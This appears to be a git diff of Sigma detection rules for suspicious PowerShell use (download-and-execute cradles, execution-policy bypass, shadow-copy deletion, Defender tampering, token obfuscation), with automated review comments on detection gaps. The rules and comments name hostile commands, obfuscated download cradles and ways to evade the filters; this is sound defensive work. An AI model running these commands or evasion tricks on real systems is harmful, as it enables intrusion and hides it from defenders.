0944e002-e3f6-4eb5-bf69-3a3067b53d73 - type: derived - - id: 3bf1d859-3a7e-44cb-8809-a99e066d3478 - type: derived + - id: cae80281-ef23-44c5-873b-fd48d2666f49 # PsScript Low + type: derived + - id: 0944e002-e3f6-4eb5-bf69-3a3067b53d73 # ProcCreation Susp + type: derived + - id: 3bf1d859-3a7e-44cb-8809-a99e066d3478 # PsScript High + type: derived status: test description: Detects PowerShell execution to set the ACL of a file or a folder references: @@ -25,14 +25,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll - - Image|endswith: - - \powershell.exe - - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe selection_cmdlet: - CommandLine|contains|all: + CommandLine|contains|all: - 'Set-Acl ' - '-AclObject ' - '-Path ' 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_set_acl_susp_location.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_set_acl_susp_location.yml index 45ac73c66..5a32e3c82 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_set_acl_susp_location.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_set_acl_susp_location.yml @@ -1,12 +1,12 @@ title: PowerShell Set-Acl On Windows Folder -id: 0944e002-e3f6-4eb5-bf69-3a3067b53d73 +id: 0944e002-e3f6-4eb5-bf69-3a3067b53d73 # ProcCreation Susp related: - - id: cae80281-ef23-44c5-873b-fd48d2666f49 - type: derived - - id: bdeb2cff-af74-4094-8426-724dc937f20a - type: derived - - id: 3bf1d859-3a7e-44cb-8809-a99e066d3478 - type: derived + - id: cae80281-ef23-44c5-873b-fd48d2666f49 # PsScript Low + type: derived + - id: bdeb2cff-af74-4094-8426-724dc937f20a # ProcCreation Low + type: derived + - id: 3bf1d859-3a7e-44cb-8809-a99e066d3478 # PsScript High + type: derived status: test description: Detects PowerShell scripts to set the ACL to a file in the Windows folder references: @@ -25,24 +25,26 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll - - Image|endswith: - - \powershell.exe - - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe selection_cmdlet: - CommandLine|contains|all: + CommandLine|contains|all: - 'Set-Acl ' - '-AclObject ' selection_paths: - CommandLine|contains: + # Note: Add more suspicious paths + CommandLine|contains: - -Path "C:\Windows - -Path 'C:\Windows - -Path %windir% - -Path $env:windir selection_permissions: - CommandLine|contains: + # Note: Add more suspicious permissions + CommandLine|contains: - FullControl - Allow condition: process_creation and (all of selection_*) 
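Review bot: The new `# Note: Add more suspicious paths` comment points at a list that only matches quoted paths (`-Path "C:\Windows`, `-Path 'C:\Windows`) plus the two environment-variable forms, so an unquoted `-Path C:\Windows\System32\...` or the `-LiteralPath` parameter form never satisfies `selection_paths`, and the `all of selection_*` condition then suppresses the alert regardless of the `FullControl`/`Allow` match. The cheapest fix is to add the unquoted and literal-path spellings to the same list: `- -Path C:\Windows`, `- -LiteralPath "C:\Windows`, `- -LiteralPath 'C:\Windows`. The `detection:` block this hunk belongs to starts before the hunk.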
diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_set_policies_to_unsecure_level.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_set_policies_to_unsecure_level.yml index fc16ea20d..2acf57223 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_set_policies_to_unsecure_level.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_set_policies_to_unsecure_level.yml @@ -1,15 +1,14 @@ title: Change PowerShell Policies to an Insecure Level id: 87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180 related: - - id: cf2e938e-9a3e-4fe8-a347-411642b28a9f - type: similar - - id: 61d0475c-173f-4844-86f7-f3eebae1c66b - type: similar - - id: fad91067-08c5-4d1a-8d8c-d96a21b37814 - type: similar + - id: cf2e938e-9a3e-4fe8-a347-411642b28a9f # ProcCreation Registry + type: similar + - id: 61d0475c-173f-4844-86f7-f3eebae1c66b # ScriptBlock + type: similar + - id: fad91067-08c5-4d1a-8d8c-d96a21b37814 # Registry + type: similar status: test -description: Detects changing the PowerShell script execution policy to a potentially - insecure level using the "-ExecutionPolicy" flag. +description: Detects changing the PowerShell script execution policy to a potentially insecure level using the "-ExecutionPolicy" flag. references: - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1 - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1 
@@ -30,19 +29,19 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll - - Image|endswith: - - \powershell.exe - - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe selection_option: - CommandLine|contains: + CommandLine|contains: - '-executionpolicy ' - ' -ep ' - ' -exec ' selection_level: - CommandLine|contains: + CommandLine|contains: - Bypass - Unrestricted condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_set_service_disabled.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_set_service_disabled.yml index 9cf9a42f6..280d30fcf 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_set_service_disabled.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_set_service_disabled.yml @@ -1,8 +1,7 @@ title: Service StartupType Change Via PowerShell Set-Service id: 62b20d44-1546-4e61-afce-8e175eb9473c status: test -description: Detects the use of the PowerShell "Set-Service" cmdlet to change the - startup type of a service to "disabled" or "manual" +description: Detects the use of the PowerShell "Set-Service" cmdlet to change the startup type of a service to "disabled" or "manual" references: - https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955 author: Nasreddine Bencherchali (Nextron Systems) 
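Review bot: `selection_option` only matches `-executionpolicy `, ` -ep ` and ` -exec `, but powershell.exe accepts any unambiguous prefix of a parameter name, so (if I recall its prefix matching correctly) `-ex Bypass`, `-exe Bypass` or `-executionpol Unrestricted` change the policy just the same and slip past the rule — the exact argument-substring trick the Bohannon reference on the sibling parameter-variation rule in this commit describes. Since `-ex` is the shortest unambiguous prefix, replacing the last entry with `- ' -ex'` covers every longer spelling, at the cost of also matching e.g. ` -Exclude` (mitigated by the `Bypass`/`Unrestricted` AND); if that trade-off is unwanted, at least document the gap on the list. The enclosing `detection:` block starts before the hunk.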
@@ -20,13 +19,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \powershell.exe - - OriginalFileName: PowerShell.EXE + - Image|endswith: \powershell.exe + - OriginalFileName: PowerShell.EXE selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - Set-Service - -StartupType - CommandLine|contains: + CommandLine|contains: - Disabled - Manual condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_shadowcopy_deletion.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_shadowcopy_deletion.yml index 98b077c40..5a582af48 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_shadowcopy_deletion.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_shadowcopy_deletion.yml @@ -1,14 +1,12 @@ title: Deletion of Volume Shadow Copies via WMI with PowerShell id: 21ff4ca9-f13a-41ad-b828-0077b2af2e40 related: - - id: e17121b4-ef2a-4418-8a59-12fb1631fa9e - type: derived - - id: c1337eb8-921a-4b59-855b-4ba188ddcc42 - type: similar + - id: e17121b4-ef2a-4418-8a59-12fb1631fa9e + type: derived + - id: c1337eb8-921a-4b59-855b-4ba188ddcc42 + type: similar status: test -description: Detects deletion of Windows Volume Shadow Copies with PowerShell code - and Get-WMIObject. This technique is used by numerous ransomware families such - as Sodinokibi/REvil +description: Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell - https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html 
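Review bot: `selection_img` covers only Windows PowerShell (`Image|endswith: \powershell.exe` / `OriginalFileName: PowerShell.EXE`), so the same `Set-Service -StartupType Disabled` issued through `pwsh.exe` is not detected, while the neighbouring rules in this commit (Set-Acl, Stop-Service, Exchange snap-ins) consistently pair both binaries. Bringing this rule in line is a two-line change: `- Image|endswith: [\powershell.exe, \pwsh.exe]` and `- OriginalFileName: [PowerShell.EXE, pwsh.dll]`. The enclosing `detection:` block starts before the hunk.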
@@ -27,15 +25,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_get: - CommandLine|contains: + CommandLine|contains: - Get-WmiObject - gwmi - Get-CimInstance - gcim selection_shadowcopy: - CommandLine|contains: Win32_Shadowcopy + CommandLine|contains: Win32_Shadowcopy selection_delete: - CommandLine|contains: + CommandLine|contains: - .Delete() - Remove-WmiObject - rwmi diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_snapins_hafnium.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_snapins_hafnium.yml index cbf5bb4c9..ad1aabb49 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_snapins_hafnium.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_snapins_hafnium.yml @@ -1,8 +1,7 @@ title: Exchange PowerShell Snap-Ins Usage id: 25676e10-2121-446e-80a4-71ff8506af47 status: experimental -description: Detects adding and using Exchange PowerShell snap-ins to export mailbox - data. As seen used by HAFNIUM and APT27 +description: Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27 references: - https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/ - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/ 
@@ -24,22 +23,22 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cli: - CommandLine|contains: Add-PSSnapin + CommandLine|contains: Add-PSSnapin selection_module: - CommandLine|contains: + CommandLine|contains: - Microsoft.Exchange.Powershell.Snapin - Microsoft.Exchange.Management.PowerShell.SnapIn filter_msiexec: + # ParentCommandLine: C:\Windows\System32\MsiExec.exe -Embedding C9138ECE2536CB4821EB5F55D300D88E E Global\MSI0000 ParentImage: C:\Windows\System32\msiexec.exe - CommandLine|contains: $exserver=Get-ExchangeServer ([Environment]::MachineName) - -ErrorVariable exerr 2> $null + CommandLine|contains: $exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_stop_service.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_stop_service.yml index a89d17f07..cd4955f41 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_stop_service.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_stop_service.yml @@ -1,8 +1,8 @@ title: Stop Windows Service Via PowerShell Stop-Service id: c49c5062-0966-4170-9efd-9968c913a6cf related: - - id: eb87818d-db5d-49cc-a987-d5da331fbd90 - type: obsoletes + - id: eb87818d-db5d-49cc-a987-d5da331fbd90 + type: obsoletes status: test description: Detects the stopping of a Windows service author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems) 
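Review bot: The new comment explains where `filter_msiexec` comes from, but the filter itself keys only on `ParentImage: C:\Windows\System32\msiexec.exe` plus a `CommandLine|contains` substring, so any PowerShell child of msiexec whose command line carries `$exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null` anywhere is excluded no matter what follows — presumably a malicious MSI, or anyone with install rights on the Exchange host, could prefix that string to an `Add-PSSnapin ... Microsoft.Exchange.Management.PowerShell.SnapIn` export and silence the alert. I would record that limitation next to the quoted ParentCommandLine, e.g. `# Note: substring-only exclusion; an msiexec-spawned child that echoes this string evades the rule`, and consider also pinning `ParentCommandLine|contains: ' -Embedding '` as the comment's own example suggests.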
@@ -19,17 +19,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_sc_net_img: - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll - - Image|endswith: - - \powershell.exe - - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe selection_cli: - CommandLine|contains: 'Stop-Service ' + CommandLine|contains: 'Stop-Service ' condition: process_creation and (all of selection_*) falsepositives: - - There are many legitimate reasons to stop a service. This rule isn't looking - for any suspicious behaviour in particular. Filter legitimate activity accordingly + - There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly level: low ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_susp_child_processes.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_susp_child_processes.yml index 995e8fca7..dcf99b318 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_susp_child_processes.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_susp_child_processes.yml 
@@ -40,12 +40,10 @@ detection: - \wmic.exe - \wscript.exe filter_optional_amazon: - ParentCommandLine|contains: \Program Files\Amazon\WorkspacesConfig\Scripts\ - CommandLine|contains: \Program Files\Amazon\WorkspacesConfig\Scripts\ + ParentCommandLine|contains: \Program Files\Amazon\WorkspacesConfig\Scripts\ # AWS Workspaces + CommandLine|contains: \Program Files\Amazon\WorkspacesConfig\Scripts\ # AWS Workspaces condition: process_creation and (selection and not 1 of filter_optional_*) falsepositives: - - Some false positive is to be expected from PowerShell scripts that might make - use of additional binaries such as "mshta", "bitsadmin", etc. Apply additional - filters for those scripts when needed. + - Some false positive is to be expected from PowerShell scripts that might make use of additional binaries such as "mshta", "bitsadmin", etc. Apply additional filters for those scripts when needed. level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_susp_download_patterns.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_susp_download_patterns.yml index b32b70a75..e04da2133 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_susp_download_patterns.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_susp_download_patterns.yml 
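Review bot: `filter_optional_amazon` excludes on substrings of `ParentCommandLine` and `CommandLine` alone, without constraining `ParentImage`, so every child in the selection list (including the `\wmic.exe`/`\wscript.exe` context lines) is exempt whenever both command lines merely mention `\Program Files\Amazon\WorkspacesConfig\Scripts\` — on a WorkSpaces host an attacker can pass that path as a harmless argument to evade the rule. The new `# AWS Workspaces` comments do not say so; I would extend one of them to `# AWS Workspaces — substring-only exclusion, tighten per environment` and, if the parent is always the WorkSpaces PowerShell host, add `ParentImage|endswith: \powershell.exe` to the filter (confirm against actual telemetry first). The `selection` block this hunk's context lines belong to starts before the hunk.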
@@ -1,12 +1,10 @@ title: Suspicious PowerShell Download and Execute Pattern id: e6c54d94-498c-4562-a37c-b469d8e9a275 related: - - id: 3b6ab547-8ec2-4991-b9d2-2b06702a48d7 - type: derived + - id: 3b6ab547-8ec2-4991-b9d2-2b06702a48d7 + type: derived status: test -description: Detects suspicious PowerShell download patterns that are often used in - malicious scripts, stagers or downloaders (make sure that your backend applies - the strings case-insensitive) +description: Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive) references: - https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70 - https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html @@ -25,7 +23,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: # make sure that your backend applies the strings case-insensitive - IEX ((New-Object Net.WebClient).DownloadString - IEX (New-Object Net.WebClient).DownloadString - IEX((New-Object Net.WebClient).DownloadString diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_susp_parameter_variation.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_susp_parameter_variation.yml index 25112d740..83834a94e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_susp_parameter_variation.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_susp_parameter_variation.yml 
@@ -4,8 +4,7 @@ status: test description: Detects suspicious PowerShell invocation with a parameter substring references: - http://www.danielbohannon.com/blog-1/2017/3/12/powershell-execution-argument-obfuscation-how-it-can-make-detection-easier -author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez - (Fix) +author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix) date: 2019/01/16 modified: 2022/07/14 tags: @@ -23,7 +22,7 @@ detection: Image|endswith: - \powershell.exe - \pwsh.exe - CommandLine|contains: + CommandLine|contains: - ' -windowstyle h ' - ' -windowstyl h' - ' -windowsty h' diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_susp_parent_process.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_susp_parent_process.yml index 2a88c229d..ec63c797c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_susp_parent_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_susp_parent_process.yml @@ -1,8 +1,8 @@ title: Suspicious PowerShell Parent Process id: 754ed792-634f-40ae-b3bc-e0448d33f695 related: - - id: 692f0bec-83ba-4d04-af7e-e884a96059b6 - type: derived + - id: 692f0bec-83ba-4d04-af7e-e884a96059b6 + type: derived status: test description: Detects a suspicious or uncommon parent processes of PowerShell references: 
@@ -22,43 +22,43 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_parent: - - ParentImage|contains: tomcat - - ParentImage|endswith: - - \amigo.exe - - \browser.exe - - \chrome.exe - - \firefox.exe - - \httpd.exe - - \iexplore.exe - - \jbosssvc.exe - - \microsoftedge.exe - - \microsoftedgecp.exe - - \MicrosoftEdgeSH.exe - - \mshta.exe - - \nginx.exe - - \outlook.exe - - \php-cgi.exe - - \regsvr32.exe - - \rundll32.exe - - \safari.exe - - \services.exe - - \sqlagent.exe - - \sqlserver.exe - - \sqlservr.exe - - \vivaldi.exe - - \w3wp.exe + - ParentImage|contains: tomcat + - ParentImage|endswith: + - \amigo.exe + - \browser.exe + - \chrome.exe + - \firefox.exe + - \httpd.exe + - \iexplore.exe + - \jbosssvc.exe + - \microsoftedge.exe + - \microsoftedgecp.exe + - \MicrosoftEdgeSH.exe + - \mshta.exe + - \nginx.exe + - \outlook.exe + - \php-cgi.exe + - \regsvr32.exe + - \rundll32.exe + - \safari.exe + - \services.exe + - \sqlagent.exe + - \sqlserver.exe + - \sqlservr.exe + - \vivaldi.exe + - \w3wp.exe selection_powershell: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - CommandLine|contains: - - /c powershell - - /c pwsh - - Description: Windows PowerShell - - Product: PowerShell Core 6 - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - CommandLine|contains: + - /c powershell # FPs with sub processes that contained "powershell" somewhere in the command line + - /c pwsh + - Description: Windows PowerShell + - Product: PowerShell Core 6 + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll condition: process_creation and (all of selection_*) falsepositives: - Other scripts diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_susp_ps_appdata.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_susp_ps_appdata.yml index 62b23dc0b..d93d4682d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_susp_ps_appdata.yml 
+++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_susp_ps_appdata.yml @@ -1,8 +1,7 @@ title: PowerShell Script Run in AppData id: ac175779-025a-4f12-98b0-acdaeb77ea85 status: test -description: Detects a suspicious command line execution that invokes PowerShell with - reference to an AppData folder +description: Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder references: - https://twitter.com/JohnLaTwC/status/1082851155481288706 - https://app.any.run/tasks/f87f1c4e-47e2-4c46-9cf4-31454c06ce03 @@ -21,16 +20,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection1: - CommandLine|contains: + CommandLine|contains: - powershell.exe - \powershell - \pwsh - pwsh.exe selection2: - CommandLine|contains|all: + CommandLine|contains|all: - '/c ' - \AppData\ - CommandLine|contains: + CommandLine|contains: - Local\ - Roaming\ condition: process_creation and (all of selection*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_susp_ps_downloadfile.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_susp_ps_downloadfile.yml index 36b528916..5279d7304 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_susp_ps_downloadfile.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_susp_ps_downloadfile.yml @@ -1,8 +1,7 @@ title: PowerShell DownloadFile id: 8f70ac5f-1f6f-4f8e-b454-db19561216c5 status: test -description: Detects the execution of powershell, a WebClient object creation and - the invocation of DownloadFile in a single command line +description: Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line references: - https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html author: Florian Roth (Nextron Systems) 
@@ -23,7 +22,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - powershell - .DownloadFile - System.Net.WebClient diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_tamper_defender_remove_mppreference.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_tamper_defender_remove_mppreference.yml index bf772dd80..a5d432829 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_tamper_defender_remove_mppreference.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_tamper_defender_remove_mppreference.yml @@ -1,11 +1,10 @@ title: Tamper Windows Defender Remove-MpPreference id: 07e3cb2c-0608-410d-be4b-1511cb1a0448 related: - - id: ae2bdd58-0681-48ac-be7f-58ab4e593458 - type: similar + - id: ae2bdd58-0681-48ac-be7f-58ab4e593458 + type: similar status: test -description: Detects attempts to remove Windows Defender configurations using the - 'MpPreference' cmdlet +description: Detects attempts to remove Windows Defender configurations using the 'MpPreference' cmdlet references: - https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088 author: Nasreddine Bencherchali (Nextron Systems) @@ -22,9 +21,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_remove: - CommandLine|contains: Remove-MpPreference + CommandLine|contains: Remove-MpPreference selection_tamper: - CommandLine|contains: + CommandLine|contains: - '-ControlledFolderAccessProtectedFolders ' - '-AttackSurfaceReductionRules_Ids ' - '-AttackSurfaceReductionRules_Actions ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_token_obfuscation.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_token_obfuscation.yml index c213445a7..08e7a9f60 100644 
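Review bot: `contains|all` requires the literal `System.Net.WebClient`, so the very common `(New-Object Net.WebClient).DownloadFile(...)` form — the same `Net.WebClient` spelling that the sibling download-pattern rule in this commit keys on — never satisfies the third term and the rule stays silent. Shortening the last term to `- Net.WebClient` matches both the bare and the fully qualified name without widening the `powershell` + `.DownloadFile` requirement. The rule's `condition:` is outside the hunk.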
--- a/sigma/sysmon/process_creation/proc_creation_win_powershell_token_obfuscation.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_token_obfuscation.yml @@ -1,8 +1,8 @@ title: Powershell Token Obfuscation - Process Creation id: deb9b646-a508-44ee-b7c9-d8965921c6b6 related: - - id: f3a98ce4-6164-4dd4-867c-4d83de7eca51 - type: similar + - id: f3a98ce4-6164-4dd4-867c-4d83de7eca51 + type: similar status: test description: Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation references: @@ -22,9 +22,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - CommandLine|re: \w+`(\w+|-|.)`[\w+|\s] - - CommandLine|re: '"(\{\d\})+"\s*-f' - - CommandLine|re: \$\{((e|n|v)*`(e|n|v)*)+:path\}|\$\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\}|\$\{env:((p|a|t|h)*`(p|a|t|h)*)+\} + # Examples: + # IN`V`o`Ke-eXp`ResSIOn (Ne`W-ob`ject Net.WebClient).DownloadString + # &('In'+'voke-Expressi'+'o'+'n') (.('New-Ob'+'jec'+'t') Net.WebClient).DownloadString + # &("{2}{3}{0}{4}{1}"-f 'e','Expression','I','nvok','-') (&("{0}{1}{2}"-f'N','ew-O','bject') Net.WebClient).DownloadString + # ${e`Nv:pATh} + - CommandLine|re: \w+`(\w+|-|.)`[\w+|\s] + # - CommandLine|re: '\((\'(\w|-|\.)+\'\+)+\'(\w|-|\.)+\'\)' TODO: fixme + - CommandLine|re: '"(\{\d\})+"\s*-f' + - CommandLine|re: \$\{((e|n|v)*`(e|n|v)*)+:path\}|\$\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\}|\$\{env:((p|a|t|h)*`(p|a|t|h)*)+\} condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_user_discovery_get_aduser.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_user_discovery_get_aduser.yml index bd8b906b4..2fbc4813c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_user_discovery_get_aduser.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_user_discovery_get_aduser.yml 
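Review bot: The new example block lists `&('In'+'voke-Expressi'+'o'+'n') (.('New-Ob'+'jec'+'t') Net.WebClient).DownloadString`, yet the only pattern that could match that string-concatenation form is the line commented out as `TODO: fixme`, so the examples advertise coverage the rule does not have; either drop that example or mark it `# not yet covered, see TODO below`. As a nit on the first active regex, `\w+`(\w+|-|.)`[\w+|\s]` ends in a character class where `+` and `|` are literals, so it also accepts those two symbols after the second backtick — `(\w|\s)` is presumably what was meant — and the unescaped `.` in `(\w+|-|.)` already matches any character, making the `-` alternative redundant. Both are widenings rather than misses, so the doc mismatch is the point worth fixing before the regex.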
@@ -1,11 +1,10 @@ title: User Discovery And Export Via Get-ADUser Cmdlet id: 1114e048-b69c-4f41-bc20-657245ae6e3f related: - - id: c2993223-6da8-4b1a-88ee-668b8bf315e9 - type: similar + - id: c2993223-6da8-4b1a-88ee-668b8bf315e9 + type: similar status: test -description: Detects usage of the Get-ADUser cmdlet to collect user information and - output it to a file +description: Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file references: - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html - https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/ @@ -24,17 +23,17 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - 'Get-ADUser ' - ' -Filter \*' - CommandLine|contains: + CommandLine|contains: - ' > ' - ' | Select ' - Out-File @@ -42,7 +41,6 @@ detection: - Add-Content condition: process_creation and (all of selection_*) falsepositives: - - Legitimate admin scripts may use the same technique, it's better to exclude - specific computers or users who execute these commands or scripts often + - Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_webclient_casing.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_webclient_casing.yml index ba1a38bf9..4be149725 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_webclient_casing.yml 
+++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_webclient_casing.yml @@ -1,9 +1,7 @@ title: Net WebClient Casing Anomalies id: c86133ad-4725-4bd0-8170-210788e0a7ba status: test -description: Detects PowerShell command line contents that include a suspicious abnormal - casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation - techniques +description: Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques references: - https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/ author: Florian Roth (Nextron Systems) @@ -21,14 +19,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_encoded: - CommandLine|contains: + CommandLine|contains: - TgBlAFQALgB3AEUAQg - 4AZQBUAC4AdwBFAEIA - OAGUAVAAuAHcARQBCA diff --git 